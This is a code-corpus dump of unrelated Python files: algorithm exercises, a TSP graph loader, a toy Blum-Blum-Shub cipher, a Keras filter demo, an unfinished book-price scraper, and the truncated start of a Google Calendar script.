blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5460325c907c6cb8dd4395aa2c9b634139593b29 | Python | Akazfu/Python-Rewind | /huawei/按身高体重排队.py | UTF-8 | 325 | 2.96875 | 3 | [] | no_license | n = '3'
# Queue people by (height, weight, 1-based id) and print the ids, each
# followed by a single space (trailing space included, as the judge expects).
height = '90 110 90'
weight = '45 60 45'
n = int(n)  # `n` is defined ('3') on the preceding metadata-fused line
height = [int(tok) for tok in height.split()]
weight = [int(tok) for tok in weight.split()]
order = sorted(range(1, n + 1),
               key=lambda pid: (height[pid - 1], weight[pid - 1], pid))
print(''.join(str(pid) + ' ' for pid in order))
| true |
43789bf1e44218a4dd8c0a8aaa5009243fed1318 | Python | qholness/HypothesisIntro | /Ship/__init__.py | UTF-8 | 1,609 | 2.859375 | 3 | [] | no_license | """
Mimick the stdout process of shipping
"""
from datetime import datetime
from time import sleep
import random
import sys
class It(object):
    """Mimic the stdout of a fake "shipping" process: spinners, random
    loading phrases, and a very slow book reading.

    Requires Text/SC4LoadingPhrases.txt and Text/atotc.txt to exist.
    """

    def __init__(self):
        sys.stdout.write("Pushing silly phrases into containers...")
        self.spin()
        with open("Text/SC4LoadingPhrases.txt", "r") as phrases:
            self.random_phrases = list(map(lambda x: x.replace('\n', ''),
                                           phrases.readlines()))
        sys.stdout.write("\n\t")
        sys.stdout.write("Loading...")
        self.spin()
        sys.stdout.write("\n")

    def bore_me(self):
        """Print A Tale of Two Cities one line every 1.5 seconds."""
        with open('Text/atotc.txt', 'r') as atotc:
            lines = atotc.readlines()
        for line in lines:
            print(f"\t{line}")
            sleep(1.5)

    def spinner(self):
        """Yield the spinner glyphs |/-\\ forever."""
        while True:
            for glyph in '|/-\\':
                yield glyph

    def spin(self, wait=10, load_rate=None):
        """Animate the spinner for roughly `wait` seconds.

        FIX: the original declared load_rate=random.randint(1, 4)/10 as a
        default argument, so one random rate was frozen at class-definition
        time for the whole run; None now means "pick a fresh rate per call".
        """
        if load_rate is None:
            load_rate = random.randint(1, 4) / 10
        now = datetime.now()
        calc_time = lambda now_time: (datetime.now() - now_time).total_seconds()
        spin = self.spinner()
        while calc_time(now) < wait:
            sys.stdout.write(next(spin))
            sys.stdout.flush()
            sleep(load_rate)
            sys.stdout.write('\b')

    def run_random_process(self, wait=10):
        """Pop a random phrase and fake a sub-process with a spinner.

        FIX: the original used random.randint(0, len(self.random_phrases)),
        whose inclusive upper bound could make pop() raise IndexError;
        randrange excludes the length.
        """
        position_choice = random.randrange(len(self.random_phrases))
        subprocess = random.choice([0, 0, 0, 1])  # 1-in-4 chance of "nested" output
        phrase = self.random_phrases.pop(position_choice)
        if subprocess:
            sys.stdout.write(f"\t\t{phrase}...")
        else:
            sys.stdout.write(f"\t{phrase}...")
        self.spin(wait=wait)
        sys.stdout.write("\n")

    def entertain_me(self):
        """Run 10-20 fake sub-processes with random 1-4 second durations."""
        num_processes = random.randint(10, 20)
        for _ in range(num_processes):
            wait_time = random.randint(1, 4)
            self.run_random_process(wait_time)

    def run(self):
        # self.entertain_me()
        self.bore_me()
| true |
8a049285b55576673d1982dd7350cee3c80d863f | Python | ckdrjs96/algorithm | /baekjoon/삼성 sw역량테스트/bj17143.py | UTF-8 | 1,722 | 3.046875 | 3 | [] | no_license | import sys
def move(r,c,s,d,z):
# print(r,c,s,d,z)
if d==1 or d==4:
dir = -1
else: dir =1
if d==1 or d==2:
s = s%((R-1)*2)
for i in range(s):
if r==R:
dir = -1
elif r == 1:
dir = 1
r += dir
if dir ==1:
d=2
else: d=1
elif d==3 or d==4:
s = s % ((C - 1) * 2)
for i in range(s):
if c==C:
dir = -1
elif c == 1:
dir = 1
c += dir
# print(c)
if dir ==1:
d=3
else: d=4
return r,c,s,d,z
# BOJ 17143: the fisher walks column by column, catches the shark nearest
# the surface in that column, then every shark moves simultaneously.
input = sys.stdin.readline
R, C, M = map(int, input().split())
# board[r][c] == [speed, direction, size]; [0, 0, 0] marks an empty cell.
board = [[[0, 0, 0] for _ in range(C + 1)] for _ in range(R + 1)]
for _ in range(M):
    a, b, s, d, z = map(int, input().split())
    board[a][b] = [s, d, z]
ans = 0
for col in range(1, C + 1):
    # Catch the shark closest to row 1 in this column.
    for row in range(1, R + 1):
        if board[row][col] != [0, 0, 0]:
            ans += board[row][col][2]
            board[row][col] = [0, 0, 0]
            break
    # Move every shark; on a collision only the biggest survives.
    new_board = [[[0, 0, 0] for _ in range(C + 1)] for _ in range(R + 1)]
    for i in range(R + 1):
        for j in range(C + 1):
            if board[i][j] != [0, 0, 0]:
                nr, nc, s, d, z = move(i, j, *board[i][j])
                if new_board[nr][nc] == [0, 0, 0]:
                    new_board[nr][nc] = [s, d, z]
                elif new_board[nr][nc][2] < z:
                    new_board[nr][nc] = [s, d, z]
    board = new_board
print(ans)
| true |
a424f5e73856113e36f0d24142317451b14b7c0b | Python | yunfengzhou-hub/leetcode | /875-Koko Eating Bananas.py | UTF-8 | 982 | 3.09375 | 3 | [] | no_license | class Solution:
def minEatingSpeed(self, piles, H):
    """LeetCode 875: smallest integer eating speed k such that Koko finishes
    all piles within H hours, spending ceil(pile / k) hours on each pile.

    Binary-searches speeds in [1, max(piles)].

    FIXES: removed a leftover debug print(start, center), which also raised
    NameError when the loop body never ran (e.g. max(piles) == 1).
    """
    def hours_needed(speed):
        # Integer ceil(pile / speed) summed over all piles, no floats.
        return sum((pile + speed - 1) // speed for pile in piles)

    start = 1
    end = max(piles)
    while end - start >= 2:
        center = (start + end) // 2
        if hours_needed(center) <= H:
            end = center
        else:
            start = center
    # Two candidates remain; prefer the smaller feasible one.
    if hours_needed(start) <= H:
        return start
    return end
# Stress-case driver for Solution.minEatingSpeed (LeetCode 875 large input).
piles = [332484035, 524908576, 855865114, 632922376, 222257295, 690155293, 112677673, 679580077, 337406589, 290818316, 877337160, 901728858, 679284947, 688210097, 692137887, 718203285, 629455728, 941802184]
H = 823855818
solver = Solution()
print(solver.minEatingSpeed(piles, H))
0905e7f966494e1ccb426c07e0cb07f4457f5ba9 | Python | strong-Ting/practice-of-python-and-git | /pi.py | UTF-8 | 679 | 3.359375 | 3 | [] | no_license | import math
def estimate_pi():
    """Estimate pi with Ramanujan's 1914 series.

    Accumulates terms until the latest term drops to 1e-15 or below.
    Returns (pi_estimate, last_term, number_of_terms).
    """
    factor = (2 * math.sqrt(2)) / 9801
    total = 0
    term = 1
    k = 0
    while abs(term) > (1e-15):
        # math.factorial is the exact integer factorial the original
        # computed by hand with its fac() helper.
        term = math.factorial(4 * k) * (1103 + 26390 * k) / (math.factorial(k) ** 4 * (396 ** (4 * k)))
        term = term * factor
        total = total + term
        k = k + 1
    return 1 / total, term, k
def fac(num):
    """Return num! computed iteratively (1 for num <= 0)."""
    if num == 0:
        return 1
    result = 1
    for factor in range(1, num + 1):
        result *= factor
    return result
# Print the series estimate next to the library constant for comparison.
print(estimate_pi())
print(math.pi)
| true |
e1a7850164015733bb1c21c14d14ed99d43814e4 | Python | faker-hong/testOne | /人工智能/python人工智能深入/卷积层/conv_visualization.py | UTF-8 | 2,880 | 2.96875 | 3 | [] | no_license | import numpy as np
import cv2
import scipy.misc
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers.convolutional import Convolution2D
import matplotlib.cm as cm
img_path = '001.jpg'
# Load the image from disk (BGR channel order, as OpenCV does).
bgr_img = cv2.imread(img_path)
# Convert to grayscale.
gray_img = cv2.cvtColor(bgr_img , cv2.COLOR_BGR2GRAY)
# Shrink the image to 30% of its size.
# NOTE(review): scipy.misc.imresize was removed in SciPy 1.3 — this needs an
# old SciPy (plus Pillow) to run; confirm the pinned environment.
small_img = scipy.misc.imresize(gray_img , 0.3)
# Scale pixel values into [0, 1].
small_img = small_img.astype('float32') / 255
# plot image
# plt.imshow(small_img, cmap='gray')
# plt.show()
# -----------------------------------------------------------------------------------------
# define filters: four 4x4 edge-detection kernels
# (vertical edges, their negation, horizontal edges via transpose, and
# a top/bottom split).
filter_1 = np.array([[-1, -1, 1, 1], [-1, -1, 1, 1], [-1, -1, 1, 1], [-1, -1, 1, 1]])
filter_2 = np.array([[1, 1, -1, -1], [1, 1, -1, -1], [1, 1, -1, -1], [1, 1, -1, -1]])
filter_3 = filter_2.T
filter_4 = np.array([[1, 1, 1, 1], [1, 1, 1, 1], [-1, -1, -1, -1], [-1, -1, -1, -1]])
filters = [filter_1, filter_2, filter_3, filter_4]
def show_filters():
    """Render the four 4x4 kernels side by side with cell values overlaid."""
    fig = plt.figure(figsize=(10, 5))
    for idx, kernel in enumerate(filters):
        ax = fig.add_subplot(1, 4, idx + 1, xticks=[], yticks=[])
        ax.imshow(kernel, cmap='gray')
        ax.set_title('Filter %s' % str(idx + 1))
        width, height = kernel.shape
        for row in range(width):
            for col in range(height):
                # Annotate in white on dark cells, black on light ones.
                ax.annotate(str(kernel[row][col]), xy=(col, row),
                            horizontalalignment='center',
                            verticalalignment='center',
                            color='white' if kernel[row][col] < 0 else 'black')
    plt.show()
# Visualize the Activation Maps for Each Filter
# plot image
# plt.imshow(small_img, cmap='gray')
# define a neural network with a single convolutional layer with one filter
# (ReLU activation; input is the grayscale image with one channel).
model = Sequential()
model.add(Convolution2D(1, (4, 4), activation='relu', input_shape=(small_img.shape[0], small_img.shape[1], 1)))
# apply convolutional filter and return output
def apply_filter(img, index, filter_list, ax):
    """Load filter_list[index] into the conv layer and draw the resulting
    activation map for img on the given axes."""
    # Keras expects kernel weights shaped (h, w, in_channels, out_channels)
    # plus a bias vector.
    weights = [np.reshape(filter_list[index], (4, 4, 1, 1)), np.array([0])]
    model.layers[0].set_weights(weights)
    batch = np.reshape(img, (1, img.shape[0], img.shape[1], 1))
    ax.imshow(np.squeeze(model.predict(batch)), cmap='gray')
# Show all four kernels in one figure...
fig = plt.figure(figsize=(12, 6))
for pos, kernel in enumerate(filters, start=1):
    ax = fig.add_subplot(1, 4, pos, xticks=[], yticks=[])
    ax.imshow(kernel, cmap='gray')
    ax.set_title('Filter %s' % pos)
# ...then the activation map each kernel produces on the small image.
fig = plt.figure(figsize=(20, 20))
for idx in range(4):
    ax = fig.add_subplot(1, 4, idx + 1, xticks=[], yticks=[])
    apply_filter(small_img, idx, filters, ax)
    ax.set_title('Activation Map for Filter %s' % str(idx + 1))
plt.show()
afa38dc53b39e2bf523ee1e7900eb21fb2cdd329 | Python | kaiwulf/crawler | /crawler.py | UTF-8 | 1,477 | 2.953125 | 3 | [] | no_license | import urllib3, re
from bs4 import BeautifulSoup
from csv import DictReader, DictWriter
# https://css-tricks.com/snippets/css/a-guide-to-flexbox/
# Using sample program from below to learn more about python webscrapping
# https://dzone.com/articles/webscraping-with-python-beautiful-soup-and-urllib3
class search:
    """Value object bundling a URL with the keywords to look for.

    FIX: the original __init__ omitted `self`, so `self.url` raised
    NameError on construction.
    """
    def __init__(self, url=None, key_words=None):
        self.url = url
        self.key_words = key_words
class crawler:
    """Placeholder crawler class.

    FIX: the original __init__ omitted `self`, so crawler() raised
    TypeError ("takes 0 positional arguments but 1 was given").
    """
    def __init__(self):
        pass
# NOTE(review): this function appears unfinished/truncated in the source:
#  - it maps `gdp_to_usd_rounded` over `pounds`, but only `gdb_to_usd` is
#    defined, so the call raises NameError;
#  - the f-string `f's {round(...), 2}'` formats a tuple prefixed with "s",
#    which looks like a typo for "$ {round(..., 2)}";
#  - `input(...)` calls pause execution (debug leftovers);
#  - the lines after `res = dict(...)` reference loop variables out of any
#    loop and look like a stray duplicated fragment.
def get_book_data(filename):
titles = []
prices = []
# Convert GBP to USD at a hard-coded exchange rate.
def gdb_to_usd(amount):
return f's {round(amount * 1.21255), 2}'
# Scrape 50 catalogue pages from books.toscrape.com.
for i in range(1,51):
url = f'http://books.toscrape.com/catalogue/category/books_1/page-{i}.html'
req = urllib3.PoolManager()
res = req.request('GET', url)
soup = BeautifulSoup(res.data, 'html.parser')
contents = soup.find_all(class_='product_pod')
input(type(soup.find_all()))
titles = []
for j in soup.find_all():
titles.append(j['title'])
pounds = []
c = []
for i in contents:
c.append(i.find().get_text())
# Pull the numeric price out of each text fragment.
for number in c:
amount = re.compile('[0-9]+.')
num = amount.findall(number)
pounds.append(float(''.join(num)))
temp = list(map(gdp_to_usd_rounded,pounds))
for t in temp:
prices.append(t)
res = dict(zip(titles,prices))
if 'title' in i.attrs:
input("title in attrs")
titles.append(i['title'])
pounds = []
c = []
b0255ae776c0a82e42aefe7afa9c88b631d0f50b | Python | kmustyxl/DSA_final_fighting | /NowCoder/Array_Sort/HeapSort_EXAM_Mid_number.py | UTF-8 | 3,643 | 4.03125 | 4 | [] | no_license | def Mid_number(arr):
'''
Maintain the running median of a data stream.
Keep a max-heap and a min-heap whose sizes never differ by more than 1:
the max-heap stores the smaller half (its top is that half's maximum),
the min-heap stores the larger half (its top is that half's minimum).
:param arr: numbers in stream order
:return: list of running medians, one per element consumed
'''
if arr is None:
return
Big_heap = [] # max-heap for the smaller half
Small_heap = [] # min-heap for the larger half
mid_num_arr = []
Big_heap.append(arr[0]) # the first number seeds the max-heap
for i in range(1,len(arr)):
if Big_heap[0] >= arr[i]: # at most the max-heap top: belongs to the smaller half
Big_heap.append(arr[i])
BigHeapinsert(Big_heap, len(Big_heap)-1) # sift up to restore the max-heap
else:
Small_heap.append(arr[i]) # otherwise it belongs to the larger half
SmallHeapinsert(Small_heap, len(Small_heap)-1) # sift up to restore the min-heap
if len(Big_heap) - len(Small_heap) >= 2: # rebalance once the size gap reaches 2
swap(Big_heap, 0, len(Big_heap)-1) # swap the max-heap top with its last slot
heapsize = len(Big_heap)-1 # shrink the heap view by one
BigHeapify(Big_heap,0,heapsize) # restore the max-heap within heapsize
remove_data = Big_heap.pop() # move the evicted top over to the min-heap
Small_heap.append(remove_data)
SmallHeapinsert(Small_heap, len(Small_heap) - 1)
elif len(Small_heap) - len(Big_heap) >= 2: # symmetric rebalance for the min-heap
swap(Small_heap, 0, len(Small_heap)-1)
heapsize = len(Small_heap) - 1
SmallHeapify(Small_heap, 0, heapsize)
remove_data = Small_heap.pop()
Big_heap.append(remove_data)
BigHeapinsert(Big_heap, len(Big_heap)-1)
# Median: average of the two tops on even counts, otherwise the top of
# whichever heap is one element larger.
if len(Big_heap) == len(Small_heap):
mid_num = (Big_heap[0] + Small_heap[0]) / 2.0
elif len(Big_heap) - len(Small_heap) == 1:
mid_num = Big_heap[0]
elif len(Big_heap) - len(Small_heap) == -1:
mid_num = Small_heap[0]
mid_num_arr.append(mid_num)
return mid_num_arr
def swap(arr, index1, index2):
    """Exchange the elements at the two given positions in place."""
    arr[index1], arr[index2] = arr[index2], arr[index1]
def BigHeapinsert(arr, index):
    """Sift arr[index] up until the max-heap property holds above it."""
    while index > 0:
        parent = (index - 1) // 2
        if arr[index] <= arr[parent]:
            break
        arr[index], arr[parent] = arr[parent], arr[index]
        index = parent
def SmallHeapinsert(arr, index):
    """Sift arr[index] up until the min-heap property holds above it."""
    while index > 0:
        parent = (index - 1) // 2
        if arr[index] >= arr[parent]:
            break
        arr[index], arr[parent] = arr[parent], arr[index]
        index = parent
def BigHeapify(arr, index, heapsize):
    """Sift arr[index] down within arr[:heapsize] to restore the max-heap.

    FIX: the original swapped unconditionally at every level, pushing the
    element all the way to a leaf even when the heap property already held
    (breaking the max-heap); a termination check is added.
    """
    left = 2 * index + 1
    while left < heapsize:
        if left + 1 < heapsize and arr[left + 1] > arr[left]:
            largest = left + 1
        else:
            largest = left
        if arr[index] >= arr[largest]:
            break  # heap property restored
        arr[index], arr[largest] = arr[largest], arr[index]
        index = largest
        left = 2 * index + 1
def SmallHeapify(arr, index, heapsize):
    """Sift arr[index] down within arr[:heapsize] to restore the min-heap.

    FIX: same defect as BigHeapify — the original swapped unconditionally at
    every level; a termination check is added.
    """
    left = 2 * index + 1
    while left < heapsize:
        if left + 1 < heapsize and arr[left + 1] < arr[left]:
            least = left + 1
        else:
            least = left
        if arr[index] <= arr[least]:
            break  # heap property restored
        arr[index], arr[least] = arr[least], arr[index]
        index = least
        left = 2 * index + 1
| true |
ac184daaef6801eef42c997761a509f5c993f32b | Python | persistforever/LeetCode | /Divide_and_Conquer/Count_Smaller_Numbers_After_Self.py | UTF-8 | 2,533 | 3.609375 | 4 | [] | no_license | # -*- encoding: gb18030
'''
315. Count of Smaller Numbers After Self
You are given an integer array nums and you have to return a new counts array.
The counts array has the property,
where counts[i] is the number of smaller elements to the right of nums[i].
Example:
Given nums = [5, 2, 6, 1]
To the right of 5 there are 2 smaller elements (2 and 1).
To the right of 2 there is only 1 smaller element (1).
To the right of 6 there is 1 smaller element (1).
To the right of 1 there is 0 smaller element.
Return the array [2, 1, 1, 0].
'''
import random
class Solution(object):
    """LeetCode 315: counts[i] = number of elements to the right of nums[i]
    that are strictly smaller, via an index-tracking merge sort."""

    def countSmaller(self, nums):
        """
        :type nums: List[int]
        :rtype: List[int]
        """
        if nums == []:
            return []
        # Pair each value with its original index.  FIX: list(zip(...)) — on
        # Python 2 zip() returned a list, which the in-place slice assignment
        # in merge() relies on; the wrapper keeps Python 3 working too.
        self.array = list(zip(nums, range(len(nums))))
        self.sorted_array = [None] * len(self.array)
        self.count = [0] * len(self.array)
        self.mergeSort(0, len(self.array) - 1)
        return self.count

    def mergeSort(self, start, end):
        # FIX: // for an integer midpoint (/ on Python 3 yields a float).
        mid = (start + end) // 2
        if start != end:
            self.mergeSort(start, mid)
            self.mergeSort(mid + 1, end)
            self.merge(start, mid, end)
        else:
            self.merge(start, mid, end)

    def merge(self, start, mid, end):
        i, j, t = start, mid + 1, start
        while i <= mid and j <= end:
            if self.array[i][0] <= self.array[j][0]:
                self.sorted_array[t] = self.array[i]
                # j - mid - 1 right-half elements were placed before
                # array[i], i.e. are strictly smaller and to its right.
                self.count[self.array[i][1]] += j - mid - 1
                i += 1
            else:
                self.sorted_array[t] = self.array[j]
                j += 1
            t += 1
        if i > mid:
            while j <= end:
                self.sorted_array[t] = self.array[j]
                j += 1
                t += 1
        elif j > end:
            while i <= mid:
                self.sorted_array[t] = self.array[i]
                self.count[self.array[i][1]] += j - mid - 1
                i += 1
                t += 1
        self.array[start:end + 1] = self.sorted_array[start:end + 1]
# Ad-hoc driver: count "smaller to the right" over a random shuffle.
# NOTE(review): the `print x` statements below are Python 2 syntax; this
# driver does not run under Python 3.
n = 5
nums = list()
for _ in range(n) :
nums.append(random.randint(0,n))
random.shuffle(nums)
print nums
s = Solution()
s.countSmaller(nums)
print s.sorted_array
print s.count
| true |
ad3dcbf1796225a98194d7b95d7c2a80ee10deca | Python | jinurajan/Datastructures | /LeetCode/facebook/top_facebook_questions/vertical_order_traversal_of_binary_tree.py | UTF-8 | 1,732 | 3.984375 | 4 | [] | no_license | """
Vertical Order Traversal of a Binary Tree
Given the root of a binary tree, calculate the vertical order traversal of the binary tree.
For each node at position (row, col), its left and right children will be at positions (row + 1, col - 1) and (row + 1, col + 1) respectively. The root of the tree is at (0, 0).
The vertical order traversal of a binary tree is a list of top-to-bottom orderings for each column index starting from the leftmost column and ending on the rightmost column. There may be multiple nodes in the same row and same column. In such a case, sort these nodes by their values.
Return the vertical order traversal of the binary tree.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from typing import List
from collections import deque, OrderedDict
class Solution:
    """LeetCode 987: vertical order traversal of a binary tree."""

    def verticalTraversal(self, root: "TreeNode") -> "List[List[int]]":
        """BFS collecting (col, row, value) triples, then sort and group.

        Returns columns left-to-right, each a top-to-bottom list of values;
        nodes sharing a cell are ordered by value.

        FIXES vs. the original: removed the unused `level_order_map`
        (defaultdict was never imported, so it raised NameError); removed the
        single-node shortcut that returned a flat [val] instead of [[val]];
        wrapped the dict view in list() so the result is a real list.
        """
        if not root:
            return []
        q = deque([(root, 0, 0)])
        node_list = []
        while q:
            node, row, col = q.popleft()
            if node:
                node_list.append((col, row, node.val))
                q.append((node.left, row + 1, col - 1))
                q.append((node.right, row + 1, col + 1))
        # Tuple sort gives column-major order with same-cell ties broken
        # by value, exactly as the problem requires.
        node_list.sort()
        result = OrderedDict()
        for col, row, val in node_list:
            result.setdefault(col, []).append(val)
        return list(result.values())
| true |
cd394fc230d751a6d902a39f551cd5d466d54882 | Python | lzx3x3/Algorithm-CSE6140 | /Traveling_Sales_Person/Code/helpers/graph.py | UTF-8 | 2,710 | 2.875 | 3 | [] | no_license | import math
from copy import deepcopy
import networkx as nx
import numpy as np
import sys
inf = 10**10
class Graph:
# Loads a TSPLIB-style instance (EUC_2D or GEO) into a dense distance
# matrix self.G (numpy) and a networkx graph self.nxG.
def __init__(self, filename):
self.filename = filename
self.load_from_file()
def parse_GEO(self, node):
# TSPLIB GEO: DDD.MM coordinates -> radians (deg + 5*min/3, PI fixed
# at 3.141592 per the spec).
i, x, y = node
i = int(i)
PI = 3.141592
deg = int(x)
min = x - deg
lat = PI*(deg + 5.0*min/3.0)/180.0
deg = int(y)
min = y - deg
lon = PI*(deg + 5.0*min/3.0)/180.0
return i, lat, lon
def get_GEO_distance(self, node1, node2):
# TSPLIB geographical distance on an idealized sphere of radius
# 6378.388 km; returns 0-based indices and the integer distance.
i, lat_i, lon_i = node1
j, lat_j, lon_j = node2
i, j = int(i)-1, int(j)-1
R = 6378.388
q1 = math.cos(lon_i-lon_j)
q2 = math.cos(lat_i-lat_j)
q3 = math.cos(lat_i+lat_j)
d = int(R * math.acos(0.5*((1.0+q1)*q2 - (1.0-q1)*q3)) + 1.0)
return i, j, d
def get_EUV_2D_distance(self, node1, node2):
# TSPLIB EUC_2D: Euclidean distance rounded to the nearest integer.
i, x_i, y_i = node1
j, x_j, y_j = node2
i, j = int(i)-1, int(j)-1
xd = x_i-x_j
yd = y_i-y_j
d = math.sqrt((xd*xd+yd*yd))
return i, j, int(d+0.5)
def load_from_file(self):
# Header is "KEY : VALUE" lines up to the coordinate section; then one
# "index x y" line per node until EOF.
nodes_list = []
params = {}
with open(self.filename, "r") as f:
line = f.readline()
while ':' in line:
key, value = line.split(':')
params[key] = value.strip()
line = f.readline()
line = f.readline()
while 'EOF' not in line:
n, x, y = line.strip().split(' ')
n, x, y = n.strip(), x.strip(), y.strip()
n, x, y = float(n), float(x), float(y)
if params['EDGE_WEIGHT_TYPE'] == 'GEO':
n, x, y = self.parse_GEO((n, x, y))
nodes_list.append([n, x, y])
line = f.readline()
dim = int(params['DIMENSION'])
graph = [[0 for i in range(dim)] for j in range(dim)]
self.city = params['NAME']
if params['EDGE_WEIGHT_TYPE'] == 'EUC_2D':
dist_func = self.get_EUV_2D_distance
else:
dist_func = self.get_GEO_distance
# Fill the symmetric matrix; the diagonal gets `inf` (module constant)
# so a node is never its own nearest neighbour.
for node1 in nodes_list:
for node2 in nodes_list:
i, j, distance = dist_func(node1, node2)
if i == j:
distance = inf
graph[i][j] = distance
graph[j][i] = distance
graph = np.array(graph)
# NOTE(review): nx.from_numpy_matrix was removed in networkx 3.x
# (from_numpy_array is the replacement) — confirm the pinned version.
self.nxG = nx.from_numpy_matrix(graph)
for i in range(len(nodes_list)):
self.nxG.remove_edge(i,i)
self.G = graph
def copy(self):
# Deep copy of the distance matrix only (not the networkx graph).
return deepcopy(self.G)
def __repr__(self):
return repr(self.G)
ebbc466dedbee4b4470eee39b19e78d81ab5d260 | Python | aayu3/PRNGs | /BBS Cryptosystem.py | UTF-8 | 2,978 | 2.765625 | 3 | [] | no_license | import time
import tkinter as tk
def binToString(binary):
    """Decode a string of 7-bit ASCII groups back to text.

    Trailing bits that do not fill a 7-bit group are ignored, and a
    '0000000' group terminates decoding early (it marks padding).
    """
    chunks = len(binary) // 7
    decoded = []
    for idx in range(chunks):
        group = binary[idx * 7:(idx + 1) * 7]
        if group == "0000000":
            break
        decoded.append(chr(int(group, 2)))
    return "".join(decoded)
def letterToBinary(char):
    """Return char's code point in binary, zero-padded to at least 7 bits."""
    bits = bin(ord(char))[2:]
    return bits.zfill(7)
def binToLetter(strnum):
    """Inverse of letterToBinary: decode a binary string to one character."""
    return chr(int(strnum, 2))
def strToBin(string):
# Convert every character of `string` to 7-bit binary, printing progress:
# `halfconvert` aliases `thing` (same list object), so each in-place
# replacement is visible in the printed join as the conversion advances.
print("Converting to Binary!")
thing = list(string)
halfconvert = thing
nthing = []
print("".join(halfconvert))
for i in range(len(thing)):
st = letterToBinary(thing[i])
nthing.append(st)
halfconvert[i] = st
print("".join(halfconvert))
# Return only the concatenated binary groups.
return "".join(nthing)
def encrypt(p,q, message):
# Blum-Blum-Shub stream cipher: XOR the message bits (zero-padded to n)
# with the parity of successive BBS states x_{i+1} = x_i^2 mod n.
n = p*q
binstring = strToBin(message)
blis = list(binstring)
if len(blis) > n:
print("The modulus is not big enough for this message")
raise OverflowError
else:
# Pad the plaintext bits with '0' up to exactly n bits.
for i in range(n-len(blis)):
blis.append("0")
# Seed x0 = (n//2)^2 mod n, then generate n further states.
xz = ((n//2)**2)%n
xlis = [xz]
for i in range(n):
xlis.append((xlis[i]**2)%n)
elis = []
for i in range(n):
elis.append(str((xlis[i]+int(blis[i]))%2))
# Ship (p, q, final state, ciphertext bits); the final state lets the
# receiver step the generator backwards in decrypt().
return [p,q,xlis[len(xlis)-1],"".join(elis)]
def qresidue(n, p):
    """Square root of n modulo a prime p with p % 4 == 3 (BBS setting).

    Of the two candidate roots, return the one that is itself a quadratic
    residue mod p (checked with Euler's criterion), which is what stepping
    the BBS state backwards requires.
    """
    root = pow(n, (p + 1) // 4, p)
    other = p - root
    if pow(root, (p - 1) // 2, p) == 1:
        return root
    return other
def solveLinearReq(p, q):
    """Extended Euclid: return [u, v] with p*u + q*v == gcd(p, q).

    For the coprime p, q used by the BBS scheme these are Bezout
    coefficients with p*u + q*v == 1.
    """
    big, small = (q, p) if p < q else (p, q)
    a, b = big, small
    quotients = []
    steps = 0  # number of nonzero remainders produced
    while True:
        quot, rem = divmod(a, b)
        quotients.append(quot)
        if rem == 0:
            break
        steps += 1
        a, b = b, rem
    # Back-substitute to build the coefficients for (big, small).
    prev_s, prev_t = 1, 0
    cur_s, cur_t = 0, 1
    for k in range(steps):
        nxt_s = prev_s - quotients[k] * cur_s
        nxt_t = prev_t - quotients[k] * cur_t
        prev_s, prev_t = cur_s, cur_t
        cur_s, cur_t = nxt_s, nxt_t
    # Order the pair so the first coefficient belongs to p.
    if p < q:
        return [cur_t, cur_s]
    return [cur_s, cur_t]
def isQR(n, p):
    """Return True iff n**((p+1)//4) % p == 1 (the author's residue check)."""
    return (n ** ((p + 1) // 4)) % p == 1
def genPrev(p, q, x, u, v):
    """Step the BBS state backwards one square via the CRT.

    u, v must satisfy p*u + q*v == 1 (from solveLinearReq); the modular
    square roots mod p and mod q are recombined modulo n = p*q.
    """
    n = p * q
    root_p = qresidue(x, p)
    root_q = qresidue(x, q)
    return (root_p * q * v + root_q * p * u) % n
def decrypt(p,q,xno,estring):
# Rebuild the BBS keystream by stepping the final state xno backwards
# n times, then XOR it off the ciphertext bits and decode 7-bit ASCII.
n= p*q
templis = solveLinearReq(p,q)
elis = list(estring)
u = templis[0]
v = templis[1]
xrevlis = [xno]
for i in range(n):
xrevlis.append(genPrev(p,q,xrevlis[i],u,v))
# Reverse to recover the forward state sequence x_0 .. x_n.
xlis = xrevlis[::-1]
olis = []
for i in range(n):
olis.append(str((xlis[i]+int(elis[i]))%2))
return binToString("".join(olis))
# Round-trip smoke test: encrypt the empty message with p=31, q=23 and
# print the decryption (expected: the empty string).
info = encrypt(31, 23, "")
print(decrypt(*info))
| true |
10b78031094140d6c3aa4e3eafa889785a32ffcb | Python | AlanEstudo/Estudo-de-Python | /ex056.py | UTF-8 | 1,000 | 4.25 | 4 | [] | no_license | # Desenvolva um programa que leia o nome, idade e sexo de 4 pessoas.
# No final do programa, mostre :
# A média de idade do grupo.
# Qual é o nome do homem mais velho.
# Quantas mulheres têm menos de 20 anos
# Read name, age and sex for 4 people, then report: the group's average age,
# the oldest man's name, and how many women are under 20.
somaIdade = 0
maisVelha = 0
nomeVelha = ''
menosIdade = 0
for c in range(1, 5):
    nome = str(input('Nome da {}º pessoa: '.format(c))).strip()
    idade = int(input('Idade da {}º pessoa: '.format(c)))
    sexo = int(input('Sexo da {}º pessoa: \n[1]MASCULINO\n[2]FEMININO\nOPÇÃO:'.format(c)))
    somaIdade += idade
    if c == 1 and sexo == 1:
        maisVelha = idade
        nomeVelha = nome
    if sexo == 1 and idade > maisVelha:
        maisVelha = idade
        nomeVelha = nome
    if sexo == 2 and idade < 20:
        menosIdade += 1
# FIX: average over all four people (the original divided by 2).
mediaIdade = somaIdade / 4
print('Média idade do grupo: {}'.format(mediaIdade))
print('Pessoa mais velha: {} com a idade de {}' .format(nomeVelha, maisVelha))
print('Mulheres com menos de 20 anos: {}'.format(menosIdade))
| true |
419b34ac3ba141db490f720552d418f3e3ddf5cc | Python | caffein123/project | /sosoclass/delete_event.py | UTF-8 | 2,382 | 2.640625 | 3 | [] | no_license | #!/usr/bin/env python
#-*- coding: utf-8 -*-
from __future__ import print_function
import datetime
from googleapiclient.discovery import build
from httplib2 import Http
from oauth2client import file, client, tools
# If modifying these scopes, delete the file token.json.
# OAuth scope: full read/write access to Google Calendar.
SCOPES = 'https://www.googleapis.com/auth/calendar'
def main():
"""Shows basic usage of the Google Calendar API.
Mirrors deletions: finds events matching a query on a source calendar and
deletes the correspondingly-suffixed copies on a target calendar.
"""
